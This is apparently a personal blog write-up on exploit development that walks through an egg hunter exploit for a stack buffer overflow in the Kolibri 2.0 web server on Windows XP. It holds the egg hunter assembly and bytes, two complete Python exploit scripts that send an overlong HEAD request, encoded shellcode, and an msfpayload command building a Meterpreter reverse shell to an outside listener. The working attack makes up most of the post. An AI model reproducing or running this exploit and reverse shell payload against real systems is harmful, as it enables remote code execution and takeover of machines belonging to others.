Egg Hunting Fun

In this vacation I thought of learning to use egg hunters in exploit development. This is just a small write up just after successful exploitation of my meterpreter reverse_tcp shellcode. This is the original exploit which was published in 2010 http://www.exploit-db.com/exploits/15834/. I wanted to implement a egg hunter code to search our shellcode with our tag throughout the heap, stack, etc. Egg hunters are used when we have a limited buffer space.

Download the vulnerable Kalbri server: http://www.exploit-db.com/wp-content/themes/exploit/applications/4d4e15b98e105facf94e4fd6a1f9eb78-Kolibri-2.0-win.zip

I assume you have a good knowledge on developing stack based buffer overflow exploits, about registers, little-endianness,etc which is the very basics.

I developed this exploit under Windows XP SP2 using the USER32.dll which is a operating system dll to find a jump to esp (JMP ESP) command. This application doesn’t use any dlls so this is a platform dependent exploit.

As I mentioned earlier this is very brief  write up.  The offset is at 515 bytes . Our plan is to overwrite the EIP register with our JMP ESP address and we want jump back 60 bytes backwards to the starting point of our hunter so that it would be executed. Then it would search everywhere inside the memory to find the tag and execute our shellcode. Opcode for jmp is EB and 60 bytes back means -60 is C4 so the shellcode would be \xeb\xc4.

I will be using an Egg hunter using NtDisplayString. The size of our Egg hunter is of 32 bytes and of course the egg size is 8 bytes.

6681CAFF0F  or dx,0x0fff
42          inc edx
52          push edx
6A43        push byte +0x43
58          pop eax
CD2E        int 0x2e
3C05        cmp al,0x5
5A          pop edx
74EF        jz 0x0
B86f736361  mov eax,0x6f736361; Our tag osca
8BFA        mov edi,edx
AF          scasd
75EA        jnz 0x5
AF          scasd
75E7        jnz 0x5
FFE7        jmp edi

So the shellcode for the above egg hunter would be:

"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8" + "osca" + "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

This is my proof of concept calculator exploit code.

#!/usr/bin/python

import socket
import os
import sys
egghunter = (
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x6f\x73" #os
"\x63\x61\x8b\xfa" #ca
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")

#Our Tag of the egghunter is oscar which is "\x6f\x73\x63\x61" in hex

shellcode=(
"\x89\xe6\xda\xc9\xd9\x76\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b"
"\x4c\x48\x68\x6d\x59\x55\x50\x33\x30\x37\x70\x43\x50\x4c\x49"
"\x38\x65\x46\x51\x6a\x72\x33\x54\x6c\x4b\x51\x42\x74\x70\x6e"
"\x6b\x51\x42\x36\x6c\x6e\x6b\x53\x62\x67\x64\x4e\x6b\x43\x42"
"\x54\x68\x46\x6f\x78\x37\x70\x4a\x34\x66\x34\x71\x6b\x4f\x35"
"\x61\x4b\x70\x6c\x6c\x67\x4c\x73\x51\x63\x4c\x74\x42\x34\x6c"
"\x75\x70\x39\x51\x78\x4f\x56\x6d\x43\x31\x48\x47\x58\x62\x58"
"\x70\x32\x72\x32\x77\x6c\x4b\x50\x52\x52\x30\x6e\x6b\x30\x42"
"\x57\x4c\x46\x61\x58\x50\x4e\x6b\x33\x70\x30\x78\x6d\x55\x59"
"\x50\x30\x74\x32\x6a\x35\x51\x6e\x30\x76\x30\x6e\x6b\x63\x78"
"\x56\x78\x4c\x4b\x63\x68\x75\x70\x56\x61\x59\x43\x78\x63\x55"
"\x6c\x72\x69\x6c\x4b\x74\x74\x4e\x6b\x73\x31\x6a\x76\x54\x71"
"\x49\x6f\x46\x51\x39\x50\x6c\x6c\x59\x51\x6a\x6f\x76\x6d\x47"
"\x71\x7a\x67\x70\x38\x59\x70\x34\x35\x79\x64\x54\x43\x31\x6d"
"\x58\x78\x75\x6b\x31\x6d\x37\x54\x51\x65\x6d\x32\x43\x68\x4c"
"\x4b\x72\x78\x44\x64\x65\x51\x39\x43\x43\x56\x6e\x6b\x64\x4c"
"\x32\x6b\x6c\x4b\x56\x38\x57\x6c\x47\x71\x58\x53\x4c\x4b\x56"
"\x64\x6c\x4b\x37\x71\x78\x50\x4e\x69\x33\x74\x76\x44\x37\x54"
"\x31\x4b\x61\x4b\x43\x51\x31\x49\x70\x5a\x56\x31\x6b\x4f\x39"
"\x70\x71\x48\x71\x4f\x62\x7a\x4e\x6b\x62\x32\x7a\x4b\x4b\x36"
"\x33\x6d\x61\x7a\x35\x51\x4c\x4d\x6e\x65\x38\x39\x47\x70\x37"
"\x70\x33\x30\x46\x30\x33\x58\x76\x51\x4c\x4b\x62\x4f\x6c\x47"
"\x79\x6f\x58\x55\x4d\x6b\x68\x70\x6e\x55\x79\x32\x66\x36\x71"
"\x78\x39\x36\x5a\x35\x4f\x4d\x6f\x6d\x39\x6f\x38\x55\x65\x6c"
"\x63\x36\x33\x4c\x66\x6a\x4d\x50\x49\x6b\x49\x70\x34\x35\x64"
"\x45\x4d\x6b\x47\x37\x47\x63\x73\x42\x62\x4f\x30\x6a\x73\x30"
"\x72\x73\x79\x6f\x79\x45\x43\x53\x53\x51\x52\x4c\x32\x43\x76"
"\x4e\x35\x35\x31\x68\x72\x45\x75\x50\x41\x41")

junk = "A"*478
esp = "\x01\xaa\xd5\x77" #0x77 d5 aa 01 - USER32.dll
extra = "A"*5
jmp = "\xEB\xc4"

exploit = junk + egghunter + extra + esp + jmp
payload = "oscaosca" + shellcode

buffer = (
"HEAD /" + exploit + " HTTP/1.1\r\n"
"Host: 192.168.111.128:8080\r\n"
"User-Agent: " + payload + "\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 8080)) #If you want to exploit this locally use the localhost of not you can exploit this remotely with the external ip and port 8080 🙂
s.send(buffer)
s.close()

vlcsnap-2013-10-29-19h59m52s199

As you see above we were able to do remote code execution using our egg hunter 🙂

Okay time to get a reverse shell and own the system 😉 I will be using a Meterpreter reverse_tcp shellcode as it is kind of fast and has more options to deal with Metasploit instead of a traditional connect back shell.

msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.100 lport=4444 R | msfencode -e x86/alpha_mixed -t c

This is our final exploit with our reverse shell.


#!/usr/bin/python

import socket
import os
import sys

print """
\t-----------------------------------------
\t\033[39m+ Kolibri Web Server Egg Hunter Exploit +
\t\033[37m+ Exploit Developed for Windows XP SP2 +
\t\033[31m+ JMP ESP from USER32.dll +
\t\033[37m+ Exploit Developed by Osanda Malith +
\t------------------------------------------
"""
egghunter = (
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x6f\x73" #os
"\x63\x61\x8b\xfa" #ca
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")

#Our Tag of the egghunter is oscar which is "\x6f\x73\x63\x61" in hex

shellcode=(
"\x89\xe0\xd9\xe8\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x6b\x4c\x4b\x58\x4c\x49\x35\x50\x65\x50\x65\x50\x33\x50\x4c"
"\x49\x38\x65\x64\x71\x6a\x72\x51\x74\x4e\x6b\x61\x42\x64\x70"
"\x4e\x6b\x56\x32\x36\x6c\x6c\x4b\x76\x32\x55\x44\x4c\x4b\x72"
"\x52\x55\x78\x46\x6f\x4d\x67\x33\x7a\x34\x66\x54\x71\x4b\x4f"
"\x30\x31\x69\x50\x4c\x6c\x45\x6c\x30\x61\x31\x6c\x45\x52\x56"
"\x4c\x47\x50\x6b\x71\x38\x4f\x66\x6d\x63\x31\x79\x57\x58\x62"
"\x6c\x30\x71\x42\x31\x47\x4e\x6b\x36\x32\x36\x70\x4e\x6b\x30"
"\x42\x57\x4c\x57\x71\x78\x50\x6c\x4b\x77\x30\x74\x38\x4e\x65"
"\x6b\x70\x34\x34\x31\x5a\x66\x61\x48\x50\x36\x30\x6c\x4b\x73"
"\x78\x34\x58\x4c\x4b\x61\x48\x71\x30\x65\x51\x6e\x33\x78\x63"
"\x75\x6c\x30\x49\x6c\x4b\x74\x74\x6e\x6b\x37\x71\x59\x46\x46"
"\x51\x49\x6f\x35\x61\x6f\x30\x4c\x6c\x6a\x61\x5a\x6f\x44\x4d"
"\x73\x31\x6a\x67\x36\x58\x6d\x30\x73\x45\x59\x64\x35\x53\x61"
"\x6d\x4c\x38\x55\x6b\x73\x4d\x57\x54\x62\x55\x5a\x42\x46\x38"
"\x4c\x4b\x51\x48\x37\x54\x73\x31\x59\x43\x71\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x72\x78\x45\x4c\x76\x61\x78\x53\x4c\x4b"
"\x33\x34\x6e\x6b\x67\x71\x4e\x30\x4e\x69\x43\x74\x51\x34\x57"
"\x54\x43\x6b\x33\x6b\x53\x51\x72\x79\x53\x6a\x33\x61\x6b\x4f"
"\x49\x70\x70\x58\x43\x6f\x53\x6a\x6e\x6b\x54\x52\x68\x6b\x4f"
"\x76\x73\x6d\x43\x58\x37\x43\x34\x72\x65\x50\x77\x70\x52\x48"
"\x74\x37\x54\x33\x74\x72\x31\x4f\x51\x44\x70\x68\x32\x6c\x64"
"\x37\x34\x66\x46\x67\x6b\x4f\x48\x55\x6c\x78\x4e\x70\x47\x71"
"\x77\x70\x73\x30\x74\x69\x7a\x64\x36\x34\x52\x70\x53\x58\x35"
"\x79\x6f\x70\x50\x6b\x57\x70\x79\x6f\x78\x55\x72\x70\x46\x30"
"\x46\x30\x42\x70\x73\x70\x62\x70\x63\x70\x66\x30\x51\x78\x68"
"\x6a\x76\x6f\x59\x4f\x39\x70\x39\x6f\x38\x55\x4a\x37\x32\x4a"
"\x46\x65\x71\x78\x59\x50\x79\x38\x37\x71\x52\x44\x42\x48\x33"
"\x32\x37\x70\x52\x31\x51\x4c\x4e\x69\x5a\x46\x30\x6a\x54\x50"
"\x46\x36\x73\x67\x31\x78\x4f\x69\x49\x35\x43\x44\x65\x31\x69"
"\x6f\x4e\x35\x4e\x65\x4f\x30\x51\x64\x64\x4c\x39\x6f\x72\x6e"
"\x75\x58\x63\x45\x7a\x4c\x63\x58\x6a\x50\x6f\x45\x69\x32\x72"
"\x76\x6b\x4f\x38\x55\x50\x6a\x77\x70\x73\x5a\x33\x34\x30\x56"
"\x62\x77\x73\x58\x44\x42\x6e\x39\x59\x58\x53\x6f\x6b\x4f\x6e"
"\x35\x6c\x4b\x47\x46\x51\x7a\x33\x70\x71\x78\x53\x30\x64\x50"
"\x43\x30\x67\x70\x42\x76\x70\x6a\x47\x70\x35\x38\x61\x48\x6f"
"\x54\x63\x63\x4a\x45\x59\x6f\x5a\x75\x4a\x33\x71\x43\x62\x4a"
"\x45\x50\x52\x76\x70\x53\x46\x37\x33\x58\x75\x52\x5a\x79\x6a"
"\x68\x61\x4f\x69\x6f\x7a\x75\x35\x51\x78\x43\x37\x59\x49\x56"
"\x4e\x65\x4a\x56\x74\x35\x6a\x4c\x69\x53\x41\x41")

junk = "A"*478
esp = "\x01\xaa\xd5\x77" #0x77 d5 aa 01 - USER32.dll
extra = "A"*5
jmp = "\xEB\xc4"
#"\xcc" +"\xEB\xc4"

exploit = junk + egghunter + extra + esp + jmp
payload = "oscaosca" + shellcode

buffer = (
"HEAD /" + exploit + " HTTP/1.1\r\n"
"Host: 172.16.71.135:8080\r\n"
"User-Agent: " + payload + "\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

try:
 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 s.connect(('172.16.71.135', 8080)) #If you want to exploit this locally use the localhost of not you can exploit this remotely with the external ip and port 8080 🙂
 print '[+] Sending Evil Payload'
 s.send(buffer)
 s.close
 print '\033[33m[+] Successfuly Exploited the Buffer Overflow'

except:
 print "[-] Can't send evil buffer"
 sys.exit(0)

vlcsnap-2013-10-29-20h00m19s229

That’s it we are in 🙂 here is the output of the cool screenshot command by our Meterpreter shell of our Win XP machine.

JxJopPRA

Egg hunting is fun isn’t it? It took me about an hour figuring out this theory and developing this exploit from the scratch. You could also give it a try by reading my example code. But I am sorry that I haven’t explained anything from the beginning because this is just small write up for the people who are in this field. I will sure start to write detailed articles on exploit developing if I get some more free time. Actually exploit developing need lots of patience 😉

I made a quick video to celebrate my happiness after getting a nice little shell ^_^

Here is a good research paper by skape about egg hunting: http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf

As always respect Peter Van Eeckhoutte (corelanc0d3r) for his tutorials and exploits.

Advertisements

8 thoughts on “Egg Hunting Fun

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s